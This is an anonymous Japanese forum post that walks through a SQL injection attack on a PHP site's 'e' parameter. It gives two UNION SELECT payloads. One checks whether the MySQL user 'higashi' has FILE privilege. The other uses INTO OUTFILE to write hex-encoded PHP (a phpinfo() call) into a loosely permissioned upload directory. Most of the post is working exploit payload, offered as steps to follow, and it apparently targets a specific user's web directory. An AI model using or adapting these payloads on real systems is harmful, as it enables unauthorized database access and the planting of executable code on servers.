696 - 一般カタルーニャ人 2021/05/19(水) 02:05:17.62 ID:0Qgc19uc0
mysqlユーザにFILE権限があることを確認
/index.php?e=-1078 union select 1,2,3,4,5,6,7,8,9,10,File_priv,12,13 from mysql.user where User='higashi'-- -
この環境だと画像がアップロードされるディレクトリのパーミッションが甘いので(/files)任意のPHPコードを置くこと考える
/index.php?e=-1078 union select 1,2,3,4,5,6,7,8,9,10,0x3C3F70687020706870696E666F28293B203F3E,12,13 into outfile "/home/higashi/public_html/files/.php"-- -